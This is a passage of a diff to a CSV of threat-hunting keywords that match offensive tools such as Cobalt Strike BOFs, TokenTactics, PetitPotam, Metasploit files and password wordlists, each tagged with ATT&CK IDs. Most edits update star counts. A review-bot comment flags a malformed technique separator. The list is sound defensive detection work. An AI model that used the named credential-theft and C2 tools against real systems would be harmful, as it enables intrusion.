TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*TokenStripBOF/src*","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" -"*TokenTactics.psd1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*TokenTactics.psm1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*TokenTactics-main.zip*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*TokenTactics.psd1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" 
+"*TokenTactics.psm1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*TokenTactics-main.zip*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" "*Tokenvator*","offensive_tool_keyword","Tokenvator","A tool to alter privilege with Windows Tokens","T1055 - T1003 - T1134","TA0004 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*Tokenvator*.exe*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*Tokenvator.csproj*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" 
@@ -17785,27 +17969,27 @@ "*token-vault.x64.o*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*token-vault.x86.o*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*TokenViewer.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*tokyoneon/Chimera*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*tomcarver16/ADSearch*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","370","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" -"*tomcat_mgr_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. 
payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*tokyoneon/Chimera*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*tomcarver16/ADSearch*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*tomcat_mgr_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*tomcat-rootprivesc-deb.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*tomcatWarDeployer -v -x -p * -H * ","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Tool-PassView*","offensive_tool_keyword","Tool-PassView","Password recovery or exploitation","T1003 - T1021 - T1056 - T1110 - T1212","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/password_recovery_tools.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*tools/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" 
"*top100_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" "*top1000_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" -"*Top109Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top12Thousand-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top1575-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top1pt6Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top207-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top29Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top2Billion-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top304Thousand-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top353Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*topotam.exe*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation 
tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1590","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" -"*topotam/PetitPotam*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1590","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" -"*tor_hiddenservices.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Top109Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top12Thousand-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top1575-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top1pt6Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top207-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" 
+"*Top29Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top2Billion-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top304Thousand-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top353Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*topotam.exe*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*topotam/PetitPotam*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" 
+"*tor_hiddenservices.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*tor_services.py*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*TORAnonymizer.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*TorBrowser-*macos_ALL.dmg*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
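Review bot: The two metasploit rows rewritten in this hunk (`*tomcat_mgr_default_userpass.txt*` and `*tor_hiddenservices.rb*`) still carry `T1204 -T1210` in the `metadata_tool_techniques` column, while every other entry in that list is separated by ` - `. A consumer that splits the column on ` - ` would get a single malformed token and lose both technique mappings, which matters if detections or coverage reports are keyed on ATT&CK IDs. Since these rows are already being rewritten for the star and fork counts, the new side should read `T1204 - T1210`. The description text looks shared across the metasploit entries, so the fix probably belongs in whatever generates these rows rather than in each line by hand.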
@@ -17818,63 +18002,63 @@ "*TorPylle*","offensive_tool_keyword","TorPylle","A Python / Scapy implementation of the OR (TOR) protocol.","T1573 - T1572 - T1553 - T1041 - T1090","TA0002 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/cea-sec/TorPylle","1","0","N/A","N/A","1","91","23","2021-10-03T18:08:41Z","2013-07-23T11:38:39Z" "*TorServiceSetup*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","0","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*totally legit pdf.pdf*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" -"*toteslegit.ps1*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" -"*tplmap*","offensive_tool_keyword","tplmap","Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system. The sandbox break-out techniques came from James Ketts Server-Side Template Injection: RCE For The Modern Web App. 
other public researches [1] [2]. and original contributions to this tool It can exploit several code context and blind injection scenarios. It also supports eval()-like code injections in Python. Ruby. PHP. Java and generic unsandboxed template engines.","T1059 - T1210.001 - T1589 - T1175","TA0002 - TA0007 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/epinna/tplmap","1","0","N/A","N/A","10","3437","670","2023-08-31T14:59:40Z","2016-07-06T20:33:18Z" +"*toteslegit.ps1*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*tplmap*","offensive_tool_keyword","tplmap","Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system. The sandbox break-out techniques came from James Ketts Server-Side Template Injection: RCE For The Modern Web App. other public researches [1] [2]. and original contributions to this tool It can exploit several code context and blind injection scenarios. It also supports eval()-like code injections in Python. Ruby. PHP. Java and generic unsandboxed template engines.","T1059 - T1210.001 - T1589 - T1175","TA0002 - TA0007 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/epinna/tplmap","1","0","N/A","N/A","10","3438","670","2023-08-31T14:59:40Z","2016-07-06T20:33:18Z" "*trailofbits/onesixtyone*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. 
It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "*trainr3kt/MemReader_BoF*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" "*trainr3kt/Readfile_BoF*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 
